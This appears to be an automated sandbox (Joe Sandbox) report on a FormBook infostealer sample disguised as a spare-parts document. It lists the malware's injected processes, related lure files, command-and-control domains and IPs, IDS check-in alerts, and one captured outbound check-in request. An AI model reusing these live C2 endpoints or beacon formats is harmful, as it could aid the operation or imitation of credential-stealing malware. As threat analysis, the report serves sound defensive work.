https://connect.facebook.net/en_US/fbevents.js | tzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://tempuri.org/DataSet1.xsd | XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe | false | | high
https://s.yimg.com/wi/ytc.js | tzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://analytics.tiktok.com/i18n/pixel/events.js | tzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dq0ib5xlct7tw.cloudfront.net/ | xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.taxiquynhonnew.click | xAbOwtcTtZmjBX.exe, 0000000A.00000002.2602984671.00000000010B6000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.taxiquynhonnew.click/y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXg | tzutil.exe, 00000009.00000002.2605003324.0000000004098000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.0000000003548000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
161.97.142.144 | www.070001325.xyz | United States | 51167 | CONTABODE | true
13.228.81.39 | dns.ladipage.com | United States | 16509 | AMAZON-02US | false
107.155.56.30 | www.expancz.top | United States | 135377 | UHGL-AS-APUCloudHKHoldingsGroupLimitedHK | true
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1562208
                                                            Start date and time:2024-11-25 10:49:06 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 8m 29s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:12
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@9/2@6/3
                                                            EGA Information:
                                                            • Successful, ratio: 75%
                                                            HCA Information:
                                                            • Successful, ratio: 90%
                                                            • Number of executed functions: 94
                                                            • Number of non-executed functions: 283
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • VT rate limit hit for: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
Time | Type | Description
04:49:58 | API Interceptor | 1x Sleep call for process: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe modified
04:51:34 | API Interceptor | 117x Sleep call for process: tzutil.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
161.97.142.144 | IETC-24017.exe | malicious | FormBook, PureLog Stealer | www.030002613.xyz/xd9h/
161.97.142.144 | Purchase Order PO.exe | malicious | FormBook | www.070002018.xyz/6m2n/
161.97.142.144 | PO #2411071822.exe | malicious | FormBook | www.54248711.xyz/jm2l/
161.97.142.144 | Quotation.exe | malicious | FormBook | www.54248711.xyz/jm2l/
161.97.142.144 | payments.exe | malicious | FormBook | www.54248711.xyz/jm2l/
161.97.142.144 | Quotation request -30112024_pdf.exe | malicious | FormBook | www.070002018.xyz/zffa/
161.97.142.144 | DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exe | malicious | FormBook | www.030003794.xyz/mpp6/
161.97.142.144 | PO-DC13112024_pdf.vbs | malicious | Unknown | www.030002350.xyz/wrcq/
161.97.142.144 | Arrival Notice.exe | malicious | FormBook | www.030003452.xyz/7nfi/
161.97.142.144 | AWB_NO_907853880911.exe | malicious | FormBook | www.030002059.xyz/er88/
13.228.81.39 | New Purchase Order.exe | malicious | FormBook | www.masteriocp.online/wg84/
13.228.81.39 | Shipping report#Cargo Handling.exe | malicious | FormBook | www.masteriocp.online/p5rq/
13.228.81.39 | PO76389.exe | malicious | FormBook | www.masteriocp.online/p5rq/
13.228.81.39 | r3T-ENQ-O-2024-10856.exe | malicious | FormBook | www.masteriocp.online/p5rq/
13.228.81.39 | SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe | malicious | FormBook | www.tmstore.click/xme5/?RD4=n0CKpMQN4gGZ92M5/3EtOcSUkm26Kn20yY4QJn1V5vv9XAZ2vYFLUkiK71x3Mm43WM97SNcNOsfAT2BrwuTBRE9eXvmWucLueMGlkNS8dNMHocOVM3LStbA=&VzA=dz5HvTSP4ZdlFHDP
13.228.81.39 | z11SOAAUG2408.exe | malicious | FormBook | www.masteriocp.online/p5rq/
13.228.81.39 | REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | www.masteriocp.online/wg84/
13.228.81.39 | Proforma_Invoice.pif.exe | malicious | FormBook | www.againbeautywhiteskin.asia/3h10/
13.228.81.39 | Arrival Notice.bat.exe | malicious | FormBook | www.againbeautywhiteskin.asia/3h10/
13.228.81.39 | Arrival Notice.bat.exe | malicious | FormBook | www.againbeautywhiteskin.asia/3h10/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
dns.ladipage.com | Swift copy.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | wavjjT3sEq.exe | malicious | FormBook | 54.179.173.60
dns.ladipage.com | COMMERCIAL-DOKUMEN-YANG-DIREVISI.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | Order.exe | malicious | FormBook, PureLog Stealer | 54.179.173.60
dns.ladipage.com | 7v8szLCQAn.exe | malicious | FormBook | 54.179.173.60
dns.ladipage.com | Amended Proforma #U2013 SMWD5043.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | AWB_5771388044 Documenti di spedizione.exe | malicious | FormBook | 54.179.173.60
dns.ladipage.com | 2nd RFQ TECMARKQATAR PO33218_PDF.exe | malicious | FormBook | 54.179.173.60
dns.ladipage.com | ncOLm62YLB.exe | malicious | FormBook | 54.179.173.60
dns.ladipage.com | PO098765678.exe | malicious | FormBook | 18.139.62.226
www.expancz.top | Swift copy.exe | malicious | FormBook | 107.155.56.30
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar
                                                            • 13.107.246.63
                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                            • 13.107.246.63
                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 13.107.246.63
                                                            05.Unzipped.obfhotel22-11.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 13.107.246.63
                                                            Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 13.107.246.63
                                                            fusioncharts.charts.jsGet hashmaliciousUnknownBrowse
                                                            • 13.107.246.63
                                                            0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 13.107.246.63
                                                            1234.exeGet hashmaliciousUnknownBrowse
                                                            • 13.107.246.63
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 13.107.246.63
                                                            somes.exeGet hashmaliciousRedLineBrowse
                                                            • 13.107.246.63
                                                            www.070001325.xyzSwift copy.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            AMAZON-02US05.Unzipped.obfhotel22-11.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 185.166.143.48
                                                            0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 185.166.143.48
                                                            55876.exeGet hashmaliciousUnknownBrowse
                                                            • 18.167.130.152
                                                            55876.exeGet hashmaliciousUnknownBrowse
                                                            • 18.167.130.152
                                                            pXdN91.armv5l.elfGet hashmaliciousMirai, GafgytBrowse
                                                            • 54.171.230.55
                                                            pXdN91.mips.elfGet hashmaliciousMirai, GafgytBrowse
                                                            • 54.171.230.55
                                                            file (1).txt.batGet hashmaliciousUnknownBrowse
                                                            • 18.181.154.24
                                                            startup.txt.batGet hashmaliciousUnknownBrowse
                                                            • 18.181.154.24
                                                            run.txt.batGet hashmaliciousUnknownBrowse
                                                            • 18.181.154.24
                                                            9758xBqgE1azKnB.exeGet hashmaliciousXWormBrowse
                                                            • 18.181.154.24
                                                            UHGL-AS-APUCloudHKHoldingsGroupLimitedHKSwift copy.exeGet hashmaliciousFormBookBrowse
                                                            • 107.155.56.30
                                                            SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                            • 152.32.197.201
                                                            SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                            • 152.32.197.201
                                                            https://rwy.xpbf130.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            http://cmn.ftft155.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            http://cmn.xfor965.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            http://cmn.pkgu192.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            http://cmn.jduv311.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            http://cmn.gvhu330.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            http://frt.asan192.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            CONTABODEIETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 161.97.142.144
                                                            purchase Order.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.168.245
                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.168.245
                                                            need quotations.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.168.245
                                                            Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                            • 144.91.79.54
                                                            Swift copy.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            No context
                                                            No context
                                                            Process:C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            Process:C:\Windows\SysWOW64\tzutil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1221538113908904
                                                            Encrypted:false
                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                            MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                            SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                            SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                            SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.935029022253541
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                                                            File size:765'952 bytes
                                                            MD5:77f595058c6627bf075a7283b57e1c5d
                                                            SHA1:2d62714bf2c62d2f09b13515b4e2aa7735477321
                                                            SHA256:8ba1a789e4494fdc1f919352cb4d80f26ea73c3dd94f978c32cde476afceb34a
                                                            SHA512:f2b943559b78b4f9918179f5e56b3ffb9cc9e4207ac87e05b088fb53df4479c82bc01720d9b2212644bb8f0427fc0d9de45ad696e9944a5162644dfe6ec6cc73
                                                            SSDEEP:12288:rPIlO3RbeX893TStEq2T7zti9LFqK3kvU7uWJgxmG5EKEYEs5FR1AkcSEcRwoNG+:rQlO35eX8932y7ti9j3JS8gIwEKEds5K
                                                            TLSH:1AF412213379AB72D6BE47F89A14638007F1A4176235E7480F8BE1EB1A97F168931F17
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.................0.............z.... ........@.. ....................... ............@................................
                                                            Icon Hash:00928e8e8686b000
                                                            Entrypoint:0x4bc37a
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0xF3BAF958 [Thu Jul 30 17:50:16 2099 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc327 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xbe000 | 0x628 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb98d8 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xba380 | 0xba400 | 6305cf8ee3913a8d6fc95c920d244425 | False | 0.950668519295302 | data | 7.942639726228952 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xbe000 | 0x628 | 0x800 | be7c4b997e932218ca19391b3b21da6c | False | 0.33935546875 | data | 3.4648181731470697 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc0000 | 0xc | 0x200 | fc2c0954981b48792a291a5529af71b3 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xbe090 | 0x398 | OpenPGP Public Key | | | 0.4206521739130435
RT_MANIFEST | 0xbe438 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T10:51:13.632871+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49874 | 161.97.142.144 | 80 | TCP
2024-11-25T10:51:13.632871+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 49874 | 161.97.142.144 | 80 | TCP
2024-11-25T10:51:31.821289+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49913 | 107.155.56.30 | 80 | TCP
2024-11-25T10:51:34.477690+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49921 | 107.155.56.30 | 80 | TCP
2024-11-25T10:51:37.258859+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49927 | 107.155.56.30 | 80 | TCP
2024-11-25T10:51:39.964629+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49933 | 107.155.56.30 | 80 | TCP
2024-11-25T10:51:39.964629+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 49933 | 107.155.56.30 | 80 | TCP
2024-11-25T10:51:47.868179+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49953 | 13.228.81.39 | 80 | TCP
2024-11-25T10:51:50.524880+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49959 | 13.228.81.39 | 80 | TCP
2024-11-25T10:51:53.180646+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49966 | 13.228.81.39 | 80 | TCP
2024-11-25T10:51:55.962213+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49972 | 13.228.81.39 | 80 | TCP
2024-11-25T10:51:55.962213+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 49972 | 13.228.81.39 | 80 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 25, 2024 10:51:11.583209038 CET | 192.168.2.9 | 1.1.1.1 | 0x5745 | Standard query (0) | www.070001325.xyz | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:51:28.966015100 CET | 192.168.2.9 | 1.1.1.1 | 0xdcf1 | Standard query (0) | www.expancz.top | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:51:29.977663994 CET | 192.168.2.9 | 1.1.1.1 | 0xdcf1 | Standard query (0) | www.expancz.top | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:51:44.981384993 CET | 192.168.2.9 | 1.1.1.1 | 0xf5d8 | Standard query (0) | www.taxiquynhonnew.click | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:51:45.993177891 CET | 192.168.2.9 | 1.1.1.1 | 0xf5d8 | Standard query (0) | www.taxiquynhonnew.click | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:52:00.981653929 CET | 192.168.2.9 | 1.1.1.1 | 0x9dd6 | Standard query (0) | www.epitomize.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 25, 2024 10:49:55.792332888 CET | 1.1.1.1 | 192.168.2.9 | 0xe6d2 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 10:49:55.792332888 CET | 1.1.1.1 | 192.168.2.9 | 0xe6d2 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:51:12.260891914 CET | 1.1.1.1 | 192.168.2.9 | 0x5745 | No error (0) | www.070001325.xyz | | 161.97.142.144 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:51:30.169820070 CET | 1.1.1.1 | 192.168.2.9 | 0xdcf1 | No error (0) | www.expancz.top | | 107.155.56.30 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:51:30.169836998 CET | 1.1.1.1 | 192.168.2.9 | 0xdcf1 | No error (0) | www.expancz.top | | 107.155.56.30 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:51:46.216439962 CET | 1.1.1.1 | 192.168.2.9 | 0xf5d8 | No error (0) | www.taxiquynhonnew.click | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 10:51:46.216439962 CET | 1.1.1.1 | 192.168.2.9 | 0xf5d8 | No error (0) | dns.ladipage.com | | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:51:46.216439962 CET | 1.1.1.1 | 192.168.2.9 | 0xf5d8 | No error (0) | dns.ladipage.com | | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:51:46.216450930 CET | 1.1.1.1 | 192.168.2.9 | 0xf5d8 | No error (0) | www.taxiquynhonnew.click | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 10:51:46.216450930 CET | 1.1.1.1 | 192.168.2.9 | 0xf5d8 | No error (0) | dns.ladipage.com | | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:51:46.216450930 CET | 1.1.1.1 | 192.168.2.9 | 0xf5d8 | No error (0) | dns.ladipage.com | | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:52:01.264401913 CET | 1.1.1.1 | 192.168.2.9 | 0x9dd6 | Name error (3) | www.epitomize.shop | none | none | A (IP address) | IN (0x0001) | false
                                                            • www.070001325.xyz
                                                            • www.expancz.top
                                                            • www.taxiquynhonnew.click
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49874 | 161.97.142.144 | 80 | 6784 | C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 10:51:12.396907091 CET | 536 | OUT | GET /gebt/?Ap=KZH8jfU0&BzI0pR=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w== HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.070001325.xyz
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Nov 25, 2024 10:51:13.632708073 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Mon, 25 Nov 2024 09:51:13 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 2966
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            ETag: "66cce1df-b96"
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Nov 25, 2024 10:51:13.632735968 CET | 1236 | IN | Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
